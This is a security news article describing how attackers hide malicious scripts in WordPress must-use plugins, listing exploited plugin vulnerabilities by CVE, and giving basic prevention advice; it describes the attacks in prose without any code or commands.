Hackers Target WordPress mu-Plugins to Hide Malware
Hackers are using WordPress’s mu-plugins to secretly plant malicious scripts on websites. These plugins, short for “must-use” plugins, run automatically without admin activation. Because of this, they don’t appear in the WordPress plugin dashboard, making them harder to spot during routine security checks.
According to a report, this method allows attackers to maintain long-term access. More importantly, it lets them redirect visitors to harmful websites and replace site images with explicit content.
What Are mu-Plugins and Why They Matter
Mu-plugins reside in the wp-content/mu-plugins folder. They’re designed to load automatically, even if not manually enabled. This convenience, however, also makes them attractive to threat actors.
Researchers found three types of harmful code placed in this folder:
- Redirect.php – sends visitors to a fake update page to download malware.
- Index.php – acts like a web shell, executing remote PHP code from outside sources.
- Custom-js-loader.php – injects spam, swaps all site images with graphic content, and hijacks links.
These scripts avoid detection by checking if the visitor is a bot. If so, the redirection or spam behavior is skipped. Therefore, search engines may never notice the issue.
Spam, Malware, and SEO Manipulation
The attacks don’t stop at redirection. Infected sites are used to trick visitors into running PowerShell commands disguised as CAPTCHA challenges. These lead to malware installations like Lumma Stealer.
Other attacks inject malicious JavaScript to steal data from checkout pages or redirect users to scam domains. Often, these infections spread through weak admin passwords, outdated themes, or vulnerable plugins.
Known Plugin Vulnerabilities Under Attack
Several known WordPress plugin flaws have been actively exploited this year, including:
- CVE-2024-27956 – Arbitrary SQL execution in WordPress Automatic Plugin.
- CVE-2024-25600 – Remote code execution via Bricks theme.
- CVE-2024-8353 – PHP object injection in GiveWP.
- CVE-2024-4345 – Arbitrary file upload via Startklar Elementor Addons.
These critical vulnerabilities give hackers full control of a site when left unpatched.
How to Prevent These Attacks
To stay safe, WordPress users must take proactive measures. First, keep all plugins and themes updated. Second, use strong passwords and enable two-factor authentication. Also, regularly scan your website files and database for unusual changes.
Most importantly, deploy a web application firewall (WAF) to filter out malicious requests. This adds an extra layer of defense and helps prevent code injection or backdoor access.
Sleep well, we got you covered.
